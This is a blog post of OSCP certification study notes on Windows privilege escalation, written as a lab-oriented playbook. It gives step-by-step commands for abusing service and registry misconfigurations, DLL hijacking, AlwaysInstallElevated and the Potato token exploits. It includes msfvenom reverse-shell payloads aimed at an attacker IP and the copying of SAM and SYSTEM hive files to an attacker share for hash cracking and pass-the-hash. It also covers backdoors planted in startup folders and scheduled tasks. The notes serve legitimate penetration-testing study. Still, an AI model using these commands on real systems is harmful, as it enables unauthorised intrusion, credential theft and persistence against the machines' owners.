Certification

OSCP notes dump: #PRIVESC-WIN

Philipp Fragstein

Mar 24, 2023 • 21 min read

Escalating privileges under Windows taught me a lot about the actual Windows architecture. Try follow the mindmap from C0nd4 to successfull elevate your rights like in my previous blog post about Linux privilege escalation:

Windows Permission Concept

#############################
windows permission concept
#############################

user accounts
- used to log in
- some are default - depending on the windows version

service accounts
- used to run services 
- login is not possible
- SYSTEM a default service account has the highest privileges
- other default accounts are: network service, local service

groups
- user accounts can belong to multiple groups
- groups can have multiple users
- groups can be nested
- regular groups have a set list of members
- pseude groups like “authenticated users” change depending on different states

resources
- files/dirs
- registry entries
- services
- whether a user/groups has permision to perform certain actions on a resource depends on the resource's ACL

ACL/ACE (access control list / access control entry)
- includes zero or more ACEs
- each ACE defines the relationshop between a principal (user/group) and a certain access right

#############################
spawning administrator shells
#############################

spawning shells
- can be achieved using msfvenom but has to be executed with admin privileges
- if RDP is enabled or can be enabled adding the low priviliged user to the administrator group is possible 
   → net localgroup administrators <username> /add

admin → SYSTEM
- can be achieved using psexec
>.\PsExec64.exe -accepteula -i -s C:\PrivEsc\reverse.exe


#########################
privilege escalation tools
#########################

powerup/sharpup
- searching for privesc misconfiguration
- powerup iswritten in powershell
- sharup iswritten in C# an pre-compiled 
- both of these tools are very limited and should be used in addition to other tools

seatbelt 
- does NOT actively hunt for privesc misconfiguration
- provides instead related information for further investigation

winpeas
- hunts for privesc misconfiguration and scores them

accesschk
- checking users access control rights
- can be used to check if a user/group has access to a resource

##############################
advanced permission concept
##############################

In Windows, user accounts and groups can be assigned specific “privileges”.
These privileges grant access to certain abilities. Some of these abilities can be used to escalate our overall privileges to that of SYSTEM.
Highly detailed paper: https://github.com/hatRiot/token-priv 
The whoami command can be used to list our user’s privileges, using the /priv option:
whoami /priv
Note that “disabled” in the state column is irrelevant here. If the privilege is listed, your user has it.

SeImpersonatePrivilege
The SeImpersonatePrivilege grants the ability to impersonate any access tokens which it can obtain. 
If an access token from a SYSTEM process can be obtained, then a new process can be spawned using that token.
The Juicy Potato exploit in a previous section abuses this ability.

SeAssignPrimaryPrivilege
The SeAssignPrimaryPrivilege is similar to SeImpersonatePrivilege.
It enables a user to assign an access token to a new process.
Again, this can be exploited with the Juicy Potato exploit.

SeBackupPrivilege
The SeBackupPrivilege grants read access to all objects on the system, regardless of their ACL.
Using this privilege, a user could gain access to sensitive files, or extract hashes from the registry which could then be cracked or used in a pass-the-hash attack.

SeRestorePrivilege
The SeRestorePrivilege grants write access to all objects on
the system, regardless of their ACL.
There are a multitude of ways to abuse this privilege:
- Modify service binaries.
- Overwrite DLLs used by SYSTEM processes
- Modify registry settings.

SeTakeOwnershipPrivilege
The SeTakeOwnershipPrivilege lets the user take ownership
over an object (the WRITE_OWNER permission).
Once you own an object, you can modify its ACL and grant
yourself write access.
The same methods used with SeRestorePrivilege then apply.

Other Privileges (More Advanced)
- SeTcbPrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeDebugPrivilege (used by getsystem)

Privilege Escalation Strategy

1. Check your user (whoami) and groups (net user <username>)
2. Run winPEAS with fast, searchfast, and cmd options.
3. Run Seatbelt & other scripts as well!
4. If your scripts are failing and you don’t know why, you can always run the
manual commands from this course, and other Windows PrivEsc cheatsheets
online (e.g.
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)

- spend some time and read over the results of your enumeration. 
- if WinPEAS or another tool finds something interesting, make a note of it.
- avoid rabbit holes by creating a checklist of things you need for the privilege escalation method to work.
- have a quick look around for files in your user’s desktop and other common locations (e.g. C:\ and C:\ProgramFiles).
- read through interesting files that you find, as they may contain useful information that could help escalate privileges.
- try things that don’t have many steps first, e.g. registry exploits, services, etc.
- have a good look at admin processes, enumerate their versions and search for exploits.
- check for internal ports that you might be able to forward to your attacking machine.
- If you still don’t have an admin shell, re-read your full enumeration dumps and highlight anything that seems odd.
- this might be a process or file name you aren’t familiar with or even a username.
- at this stage you can also start to think about Kernel Exploits.

Tools

powerup/sharup

# powerup
..\Powerup.ps1
Invoke-AllChecks

# sharup
./sharpup.exe

seatbelt

# list non-standard services
.\seatbelt.exe NonstandardServices 

# run all enumeration checks
.\seatbelt.exe all

winpeas

# allow colors
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

# execute all checks
.\winpeas.exe

accesschk

.\accesschk.exe /accepteula

Kernel Exploitation

methodology

1. enumerate windows version/patch level (systeminfo)
2. find matching exploits
3. compile and run 

# windows exploit suggestor 
- use the “systeminfo” output 

precompiled - kernel exploits

# watson
- enumerate kernel exploits

windows exploit suggestor

# wes target
systeminfo > \\192.168.1.11\tools\systeminfo.txt

# wes attacker ( searching only for kernel exploits)
python wes.py /tools/systeminfo.txt -i ‘Elevation of Privilege’ --exploits-only | more

# use the output to to search in SEC-WIKI list &/or Github
# in some case a reverse shell needs to be appened to the exploit-binary

Service Exploitation

- simple programs running in the background, accept input or performing regular tasks
- if services run with SYSTEM privileges and are misconfigured, exploiting them may lead to command execution
- each service has an ACL 

# insecure service permissions
- useful permission are: SERVICE_STOP/SERVICE_START/SERVICE_CHANGE_CONFIG/SERVICE_ALL_ACCESS
- if the configuration can be changed - the executable of the service can be changed
- RABBIT HOLE: if a service can be changed but nut stopped/started 

# unquoted service path 
- executables in Windows can be run without using their extension (.exe)
- some executables take arguments, seperated by spaces
- this behavior leads to ambiguity when using absolute paths that are unqoted and contain spaces 
- for example: C:\Program Files\Some Dir\SomeProgram.exe
   → To us, this obviously runs SomeProgram.exe. To Windows, C:\Program could be the executable, with two arguments: “Files\Some” and “Dir\ SomeProgram.exe”

# weak registry permissions
- the windows registry stores entries for each service
- since reg entries can have ACLs, if the ACL is misconfigured, it may be possible to modify a service's configuration
- this is even possible when the service isn't modifiable itself

# insecure service executables
- replace the service executable
- backup the original executbale 

# dll hijacking
- dll (dynmaic-link labrary) are loaded by applications
- they inherit privilege of ther overlaying application
- dll loaded with an absolute path could be replaced by the user to escalate privileges
- if a dll is missing and the user has write access to the PATH that windows search Dlls in a privilege escalation can be done

service interaction

# query the configuration of a service
sc.exe qc <name>

# query the current status of a service
sc.exe query <name>

# modify a configuration option of a service
sc.exe config <name> <option>= <value>

# start/stop a service
net start/stop <name>

insecure service permissions

1. initial enumeration
.\winPEASany.exe quiet servicesinfo

2. search for entries about modifiying services 
- output can be seen under category [+] Interesting Services -non Microsoft 
- output can be seen under category [+] Modifiable Services 

3. verification over accesschk 
.\ accesschk.exe /accepteula -uwcqv user daclsvc 

4. query service to find executbale
.\sc.exe qc daclsvc

5. check state of the service
.\sc.exe query daclsvc

6. set binary path to location of reverse shell payload
.\sc.exe config daclsvc binpath= “\” C:\PrivEsc\rervse.exe\""

7. start service while having listener activated 
net start daclsvc

unquoted service paths

1. initial enumeration
.\winPEASany.exe quiet servicesinfo

2. search for entries about modifiying services 
- output can be seen under category “[+] Interesting Services -non Microsoft”
- output should include “No quotes and Space detected”

3. check if service can be started
.\ accesschk.exe /accepteula -uwcqv user daclsvc 

4. check for write permission in each of the directories to the binary path
.\ accesschk.exe /accepteula -uwdq C:\
.\ accesschk.exe /accepteula -uwdq “C:\Program Files \”
...
...

5. drop shell with the appropriate name in folder 
copy reverse.exe “C:\Program FIles\Unquoted Path Service\Common.exe”

6. start the service
net start unquotedsvc

weak registry permissions

1. initial enumeration
.\winPEASany.exe quiet servicesinfo

2. search for entries about modifiying services 
- output can be seen under category “[+] Looking if you can modify any service registry”

3. verify permission using powershell
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
- if “NT AUTHORITY\INTERACTIVE” Group has full control over reg entry. This includes all users that can logon to the system locally. 

3. verify permission using accesschk
.\accesschk.exe /accepteula -uvwqk  HKLM\System\CurrentControlSet\Services\regsvc 
- if “NT AUTHORITY\INTERACTIVE” Group has full control over reg entry. This includes all users that can logon to the system locally. 

4. check if service can be started
.\accesschk.exe /accepteula -ucqv user gesvc

5. check current value in the reg entry
req query HKLM\SYSTEM\CurrentControlSet\services\regsvc

6. override value with path to reverse shell payload
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

7. start service
net start regsvc

insecure service executables

1. initial enumeration
.\winPEASany.exe quiet servicesinfo

2. search for entries about modifiying services 
- output can be seen under category “[+] Interesting Services...”
- output should contain: “File Permission: Everyone [AllAccess]”

3. verify permission using accesschk
.\accesschk.exe /accepteula -quvw “C:\test.exe”

4. check if service can be stopped/started
.\accesschk.exe /accepteula -uvqc test

5. backup original service executable
copy  “C:\test.exe” C:\

6. replace original executable with reverse shell payload
copy /Y C:\reverse.exe “C:\test.exe”

7. start listener and start service
net start test

dll hijacking

1. initial enumeration
.\winPEASany.exe quiet servicesinfo

2. search for entries about modifiying services 
- output can be seen under category [+] Interesting Services -non Microsoft 
- output should include “DLL Hijacking..”

3. enumerate services where stop/start is possible
accesschk.exe /accepteula -uvqc user dllsvc

4. check the underlaying service executable
.\sc.exe qc dllsvc

5. check executable with proccess monitor 
- copy the file to a machine where admin rights are set
- run procmon with administrator privileges
- press “Ctrl+L” to open the Filter menu
- add a new filter on the Process Name matching dllhijackservice.exe
- on the main screen, deselect registry activity and network activity.
- start the service
net start dllsvc
- search for “NAME NOT FOUND” entries matching a folder where write access is given

6. create dll reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -LPORT=53 -f dll -o /root/inject.dll

7. copy inject.dll into wirtable directory 

8. start listener and start service
net start dllsvc

Registry Exploitation

# autoruns
- startup processes can be run with elevated privileges
- autoruns are configured in the registry
- if the autorun executable can be replaced and the system restarted privesc is possible

# alwaysinstallelevated
- msi files are used to install applications
- msi files run with the user trying to use them for installation
- windows allows them to be run with elevated privileges
- a malicious can be placed
- two registry settings must be enabled for this to work. “AlwaysinstallElevated” value muste be set to 1 for both:
   → local machine HKLM\SOFTWARE\Policies\MIcrosoft\Windows\Installer
   → current user HKCU\SOFTWARE\Policies\MIcrosoft\Windows\Installer

autoruns

1. initial enumeration
.\winPEASany.exe quiet applicationsinfo

2. search for entries about modifiying services 
- output can be seen under category “[+] Autorun Applications...”

3. manually enumerate the autorun executables
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

4. use accesschk.exe to verify the permissions on each one:
.\accesschk.exe /accepteula -wvu "C:\ProgramFiles\Autorun Program\program.exe"

5. create backup of the original executable
copy "C:\Program Files\Autorun Program\program.exe" C:\Temp

6. replace original executable with reverse shell payload
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\AutorunProgram\program.exe"

7. start listender and restart host
note that on Windows 10, the exploit appears to run with the privileges of the last logged on user

alwaysinstallelevated

1. initial enumeration
.\winPEASany.exe quiet windowscreds

2. search for entries about modifiying services 
- output can be seen under category “[+] Checking AlwaysInstallElevated”

3. verify the values manually
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

4. create a new reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi

5. start listener and copy/execute the reverse.msi on the target host 
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

Passwords

# passwords can be found in readble locations on the system

# registry
- windows stores creds insecurely 
- sometimes passwords are stored in the registry

# saved creds
- for using running an application as a different user, windows requires anothers users credentials. these credentials can be saved 

# configuration files
- configuration files can contain passwords
- “Unattend.xml” file is an example for this used for largely automated setups in Windows. 

# SAM
- windows stores hashes in the Security Account Manager (SAM)
- the hashes are encrypted with a key which can be found in a file name SYSTEM.
- if the user is able to read the SAM and SYSTEM file, hashes can be extracted

# passing the hash
- windows accepts hashes instead of passwords to authenticate to a number of services
- a modified version of winexe pth-winexe can be used to spawn a comannd promt using the admin user's hash

registry

1. search registry local machine aswell as current user for the string “password”
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

2. using winpeas to find entries in registry
.\winPEASany.exe quiet filesinfo userinfo

3. using creds to login
winexe -U 'admin%password123' //192.168.1.22 cmd.exe

# spawn a system shell
winexe -U 'admin%password123' //192.168.1.22 cmd.exe

savedcreds

1. use winPEAS to check for saved credentials:
.\winPEASany.exe quiet cmd windowscreds

2. it appears that saved credentials for the admin user exist.

3. we can verify this manually using the following command:
cmdkey /list

4. we can use the saved credential to run any command as the admin user. Start a listener on Kali and run the reverse shell executable:
runas /savecred /user:admin C:\PrivEsc\reverse.exe

configuration files

Do not do this on root due to the large output
1. recursively search for files in the current directory with “pass” in the name, or ending in “.config”. 
dir /s *pass* == *.config

2. recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt:
findstr /si password *.xml *.ini *.txt

3. use winPEAS to search for common files which may contain credentials:
.\winPEASany.exe quiet cmd searchfast filesinfo

4. the Unattend.xml file was found. view the contents:
type C:\Windows\Panther\Unattend.xml

5. a password for the admin user was found. The password is Base64 encoded: cGFzc3XXXQxMjM=

6. on Kali we can easily decode this:# echo "cGFzc3dXXXQxMjM=" | base64 -d

7. once again we can simply use winexe to spawn a shell as the admin user.

SAM

1. the SAM and SYSTEM files are located in the C:\Windows\System32\config directory. 

2. the files are locked while Windows is running.

3. backups of the files may exist in the C:\Windows\Repair or C:\Windows\System32\config\RegBack directories.

4. backups of the SAM and SYSTEM files can be found in C:\Windows\Repair and are readable by our user.

5. copy the files back to Kali:
copy C:\Windows\Repair\SAM \\192.168.1.11\tools\
copy C:\Windows\Repair\SYSTEM \\192.168.1.11\tools\

6. download the latest version of the creddump suite:
git clone https://github.com/Neohapsis/creddump7.git

7. run the pwdump tool against the SAM and SYSTEM files to extract the hashes:
python2 creddump7/pwdump.py SYSTEM SAM

5. crack the admin user hash using hashcat. NTLM starting with “31d6” means either an empty password or a deactivated account. 
hashcat -m 1000 --force a9fdfa038cYYYYYYdc855dd74f0da /usr/share/wordlists/rockyou.txt

pass the hash

1. extract the admin hash from the SAM in the previous step.

2. use the hash with pth-winexe to spawn a command prompt
pth-winexe -U 'admin%aad3bYYYYYYY435b51404ee:a9fdfa038YYYYYYdd74f0da' //192.168.1.22 cmd.exe

3. use the hash with pth-winexe to spawn a SYSTEM level command prompt
pth-winexe --system -U 'admin%aad3b435b514YYYYYYY435b51404ee:a9fdfa038c4YYYYYYYc855dd74f0da' //192.168.1.22 cmd.exe

Scheduled Tasks

- windows can be configured to run tasks periodically 
- windows can be configured to run tasks on an event
- tasks run under the user who created them
- administrators can configure tasks to run as other users
- there is no easy method to enumerate tasks belonging to other users as low priviliged ones

commands

1. list all scheduled tasks your user can see
schtasks /query /fo LIST /v

in PowerShell:
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

2. often we have to rely on other clues, such as finding a script or log file that indicates a scheduled task is being run

3. in the C:\DevTools directory, there is a PowerShell script called “CleanUp.ps1”. 
type C:\DevTools\CleanUp.ps1

4. this script seems like it is running every minute as the SYSTEM user. Wecan check our privileges on this script using accesschk.exe
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

It appears we have the ability to write to this file.

5. backup the script:
copy C:\DevTools\CleanUp.ps1 C:\Temp\

6. start a listener on Kali.

7. use echo to append a call to our reverse shell executable to the end of the script
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

8. wait for the scheduled task to run (it should run every minute) to complete the exploit

Insecure GUI (Citrix Method)

- on older versions of Windows, users could be granted to run certain GUI Apps with administrator privileges
- there are often numerous ways to spawn command prompts from within GUI apps, including using native Windows functionality.
- the parent process is running with administrator privileges, spawned command promt will inherit this right
- it uses many of the same techniques used to break out of Citrix environments.

mspaint.exe

1. log into the Windows VM using the GUI with the “user”account.

2. double click on the “AdminPaint” shortcut on the Desktop.

3. open a command prompt and run
tasklist /V | findstr mspaint.exe

Note that mspaint.exe is running with admin privileges.

4. In Paint, click File, then Open.

5. In the navigation input, replace the contents with
file://c:/windows/system32/cmd.exe

6. press Enter. A command prompt should open running with admin privileges.

Startup Apps

- each user can define apps that start when they log in
- windows has a startup directory for apps that should start for all users:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
- If we can create files in this directory, we can use our reverse shell executable and escalate privilegeswhen an admin logs in.

startup

1. use accesschk.exe to check permissions on the StartUp directory:
.\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

2. note that the BUILTIN\Users group has write access to this directory.

3. create a file CreateShortcut.vbs with the VBScript provided in a previous slide. Change file paths if necessary.

Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save

4. run the script using cscript:
cscript CreateShortcut.vbs

5. start a listener on Kali, then log in as the admin user to trigger the exploit.

Installed Applications

1. manually enumerate all running programs:
tasklist /v

2. we can also use Seatbelt to search for nonstandard processes:
.\seatbelt.exe NonstandardProcesses

winPEAS also has this ability (note the misspelling):
.\winPEASany.exe quiet procesinfo

3. once you find an interesting process, try to identify its version. You can try running the executable with /? or -h, aswell as checking config or text files in the Program Files directory.

4. use Exploit-DB to search for a corresponding exploit. Some exploits contain instructions, while others are code that you will need to compile and run.

Hot Potato

- hot Potato is the name of an attack that uses a spoofing attack along with an NTLM relay attack to gain SYSTEM privileges.
- the attack tricks Windows into authenticating as the SYSTEM user to a fake HTTP server using NTLM. 
- the NTLM credentials then get relayed to SMB in order to gain command execution. 
- this attack works on Windows 7, 8, early versions of Windows 10, and their server counterparts.

commands

(Note: These steps are for Windows 7)
1. copy the potato.exe exploit executable over to Windows

2. start a listener on Kali

3. run the exploit:
.\potato.exe -ip 192.168.1.33 -cmd "C:\PrivEsc\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

4. wait for a Windows Defender update, or trigger one manually.

Token Impersonisation

- service accounts can be given special privileges in order for them to run their services, and cannot be logged into directly.
- multiple problems have been found with service accounts, making them easier to escalate privileges with.
- SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege must be assigned to the user (whoami /priv)

rotten potato

- the original Rotten Potato exploit was identified in 2016.
- service accounts could intercept a SYSTEM ticket and use it to impersonate the SYSTEM user.
- this was possible because service accounts usually have the “SeImpersonatePrivilege” privilege enabled.
- service accounts are generally configured with these two privileges.
- they allow the account to impersonate the access tokens of other users (including the SYSTEM user).
- any user with these privileges can run the token impersonation exploits in this lecture.
- whomami /priv shows the priviliges of the service account

juicy potato

- rotten potato was quite a limited exploit.
- juicy potato works in the same way as Rotten Potato, but the authors did extensive research and found many more ways to exploit.
https://github.com/ohpe/juicy-potato

these steps are for Windows 7
1. copy PSExec64.exe and the JuicyPotato.exe exploit executable over to Windows.

2. start a listener on Kali.

3. using an administrator command prompt, use PSExec64.exe to trigger a reverse shell running as the Local Service service account:
C:\PrivEsc\PSExec64.exe -i -u "ntauthority\local service" C:\PrivEsc\reverse.exe

4. start another listener on Kali.

5. now run the JuicyPotato exploit to trigger a reverse shell running with SYSTEM privileges:
C:\PrivEsc\JuicyPotato.exe -l 1337 -p C:\PrivEsc\reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

6. if the CLSID ({03ca…) doesn’t work for you, either check this list: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md or run the GetCLSID.ps1 PowerShell script.

rogue potato

- latest of the “Potato” exploits.
- gitHub: https://github.com/antonioCoco/RoguePotato
- blog: https://decoder.cloud/2020/05/11/no-morejuicypotato-old-story-welcome-roguepotato/ 
- compiled exploit: https://github.com/antonioCoco/RoguePotato/releases

1. copy PSExec64.exe and the RoguePotato.exe exploit executable over to Windows.

2. set up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows (192.168.1.22 is the Windows IP):
sudo socat tcp-listen:135,reuseaddr,fork tcp:192.168.1.22:9999

3. Start a listener on Kali.

4. Using an administrator command prompt, use PSExec64.exe to trigger a reverse shell running as the Local Service service account:
C:\PrivEsc\PSExec64.exe -i -u "ntauthority\local service" C:\PrivEsc\reverse.exe

5. Start another listener on Kali.

6. Now run the RoguePotato exploit to trigger a reverse shell running with SYSTEM privileges (192.168.1.11 is the Kali IP):
C:\PrivEsc\RoguePotato.exe -r 192.168.1.11 –l 9999 -e "C:\PrivEsc\reverse.exe"

print spoofer

- printspoofer is an exploit that targets the Print Spooler service.
- gitHub: https://github.com/itm4n/PrintSpoofer
- blog: https://itm4n.github.io/printspoofer-abusingimpersonate-privileges/

1. copy PSExec64.exe and the PrintSpoofer.exe exploit executable over to Windows.

2. start a listener on Kali.

3. using an administrator command prompt, use PSExec64.exe to trigger a reverse shell running as the Local Service service account:
C:\PrivEsc\PSExec64.exe -i -u "ntauthority\local service" C:\PrivEsc\reverse.exe

4. start another listener on Kali.

5. now run the PrintSpoofer exploit to trigger a reverse shell running with SYSTEM privileges:
C:\PrivEsc\PrintSpoofer.exe –i -c "C:\PrivEsc\reverse.exe"

Port Forwarding

- sometimes it's easier to run exploit code on the attackers box
- in these cases local port forwarding to the kali box is useful 
- the port forwarding can be achieved used a program called “plink.exe”


1. the general format of a port forwarding command using plink.exe
plink.exe <user>@<kali> -R <kaliport>:<target-IP>:<target-port>

- the <target-IP> is usually local (e.g. 127.0.0.1). 

2. plink.exe requires you to SSH to Kali, and then uses the SSH tunnel to forward ports.

plink.exe

1. first, test that we can still login remotely via winexe:
winexe -U 'admin%password123' //192.168.1.22 cmd.exe

2. using an administrator command prompt, re-enable the firewall:
netsh advfirewall set allprofiles state on

3. confirm that the winexe command now fails.

4. copy the plink.exe file across to Windows, and then kill the SMB Server on Kali (if you are using it).

5. make sure that the SSH server on Kali is running and accepting root logins. Check that the “PermitRootLogin yes” option is uncommented in /etc/ssh/sshd_config. Restart the SSH service if necessary.

6. on Windows, use plink.exe to forward port 445 on Kali to the Windows port 445
plink.exe root@192.168.1.11 -R 445:127.0.0.1:445

7. on Kali, modify the winexe command to point to localhost (or 127.0.0.1) instead, and execute it to get a shell via the port forward:
winexe -U 'admin%password123' //localhost cmd.exe

GETSYSTEM (NAMED PIPES & TOKEN DUPLICATION)

- access Tokens are special objects in Windows which store a user’s identity and privileges.
- primary Access Token – Created when the user logs in, bound to the current user session. 
- when a user starts a new process, their primary access token is copied and attached to the new process.
- Impersonation Access Token – Created when a process or thread needs to temporarily run with the security context of another user.

# Summary
- getsystem was designed as a tool to escalate privileges from a local admin to SYSTEM.
- the Named Pipe techniques require local admin permissions.
- the Token Duplication technique only requires the SeDebugPrivilege privilege, but is also limited to x86 architectures.
- getsystem should not be thought of as a user -> admin privilege escalation method in modern systems.

token duplication

- windows allows processes/threads to duplicate their access tokens.
- an impersonation access token can be duplicated into a primary access token this way.
- If we can inject into a process, we can use this functionality to duplicate the access token of the process, and spawn a separate process with the same privileges.

named pipes

- you may be already familiar with the concept of a “pipe” in Windows & Linux:
systeminfo | findstr Windows
- a named pipe is an extension of this concept.
- a process can create a named pipe, and other processes can open the named pipe to read or write data from/to it.
- the process which created the named pipe can impersonate the security context of a process which connects to the named pipe.

getsystem

- the “getsystem” command in Metasploit’s Meterpreter shell has an almost mythical status.
- by running this simple command, our privileges are almost magically elevated to that of the SYSTEM user.

What does it actually do?
- the source code for the getsystem command can be found here:
https://github.com/rapid7/metasploitpayloads/tree/d672097e9989e0b4caecfad08ca9debc8e50bb0c/c/meterpreter/source/extensions/priv
- three files are worth looking through: 
   → elevate.c,
   → namedpipe.c, and 
   → tokendup.c
- there are 3 techniques getsystem can use to “get system”.

named pipe impersonisation (in memory/admin)

- creates a named pipe controlled by Meterpreter.
- creates a service (running as SYSTEM) which runs a command that interacts directly with the named pipe.
- meterpreter then impersonates the connected process to get an impersonation access token (with the SYSTEM security context)
- the access token is then assigned to all subsequent Meterpreter threads, meaning they run with SYSTEM privileges.

named pipe impersonisation (dropper/admin)

- very similar to Named Pipe Impersonation (In Memory/Admin).
- only difference is a DLL is written to disk, and a service created which runs the DLL as SYSTEM.
- the DLL connects to the named pipe.

token duplication (in memory/admin)

- this technique requires the “SeDebugPrivilege”.
- it finds a service running as SYSTEM which it injects a DLL into.
- the DLL duplicates the access token of the service and assigns it to Meterpreter.
- currently this only works on x86 architectures.
- this is the only technique that does not have to create a service, and operates entirely in memory.

Misc

precompiled exploits
https://github.com/SecWiki/windows-kernel-exploits

print username
C:\Users\student>whoami

print users rights
C:\Users\student>whoami /priv

print additional information about the user provided in argv 
C:\Users\student>net user <user>

print all users
C:\Users\student>net user

print hostname 
C:\Users\student>hostname

enumerating the Operating System Version and Architecture
C:\Users\student>systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

enumerating Running Processes and Services
C:\Users\student>tasklist /SVC

list the services running under a specific user account
tasklist /v /fi "username eq SERVICE_ACCT05"

display the ip configuration
C:\Users\student>ipconfig /all

print routing information
C:\Users\student>route print

print information about active network connection as well as listening ports
C:\Users\student>netstat -ano

enumerating Firewall Status and Rules
C:\Users\student>netsh advfirewall show currentprofile

enumerating Scheduled Tasks
C:\Users\student>schtasks /query /fo LIST /v

enumerating Installed Applications and Patch Levels 
C:\Users\student>wmic product get name, version, vendor  // only with windows intaller installed apps

list system-wide updates
C:\Users\student>wmic qfe get Caption, Description, HotFixID, InstalledOn

finding unquoted service paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows"

checking permissons from file
icacls C:\Puppet

enumerate the Program Files directory in search of any file or directory that allows the Everyone 476 group write permissions.
C:\Tools\privilege_escalation\SysinternalsSuite>accesschk.exe -uws "Everyone" "C:\Program Files"

any object can be modified (Modify) by members of the Everyone group.
PS C:\Tools\privilege_escalation\SysinternalsSuite>Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

enumerating Unmounted Disks
C:\Users\student>mountvol

enumerating Device Drivers and Kernel Modules
PS C:\Users\student> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path

specifically target drivers based on their name by piping the output to Where-Object.
PS C:\Users\student> Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

enumerating Binaries That AutoElevate
C:\Users\student>reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
C:\Users\student>reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

link collection